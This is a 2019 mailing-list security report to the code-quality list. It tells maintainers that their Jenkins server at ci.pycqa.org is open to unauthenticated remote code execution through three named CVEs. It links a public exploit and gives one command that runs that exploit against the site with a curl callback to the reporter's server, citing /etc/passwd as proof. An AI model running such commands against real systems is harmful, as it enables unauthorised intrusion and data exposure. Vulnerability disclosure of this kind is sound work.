[code-quality] [Security] Jenkins Unauthenticated RCE on https://ci.pycqa.org/

Ái. Hồ Quốc aihq at vng.com.vn
Wed May 15 22:45:39 EDT 2019


Dear Sir/Madam,

While searching Jenkins Dashboard I discovered that this domain (https://ci.pycqa.org/) is vulnerable to these CVEs (CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029), which allow an attacker to execute arbitrary commands on a target operating system.

Steps To Reproduce:
Download the exploit (https://github.com/orangetw/awesome-jenkins-rce-2019) and issue the command below:

python2.7 exp.py https://ci.pycqa.org/ "curl myserver.ip/oob/"

Then I check my server to verify that the command executed (see attached images for a PoC of the content of the /etc/passwd file).


Best regards,
-j3ssie-